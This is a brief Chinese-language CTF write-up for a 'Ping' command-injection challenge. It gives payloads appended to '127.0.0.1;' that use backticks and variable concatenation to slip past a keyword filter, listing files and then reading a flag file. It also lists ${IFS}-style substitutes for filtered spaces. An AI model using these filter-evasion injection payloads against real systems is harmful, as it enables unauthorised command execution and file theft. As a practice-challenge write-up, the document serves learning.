題目連接:http://ctf.klmyssn.com/challenges#Ping
命令執行繞過,試了試過濾了一些:一些命令
但是反引號可以執行命令
通過拼接,可以拼接出來:ls 命令
127.0.0.1;`a="l";b="s";c=$a$b;$c`
可以發現 flag 就是下面那一串 flag_ 開頭的字符串
在拼接命令來查看:
127.0.0.1;`a="ca";b="t${IFS}fla";c="g_ae8e4cd6ce3b5";d=$a$b$c;$d`
針對空格過濾,可以使用:
${IFS}
< (也被過濾了)
$IFS
$IFS$9
來代替,但是考慮到在一串字符串中,所以使用 ${IFS} 來代替空格
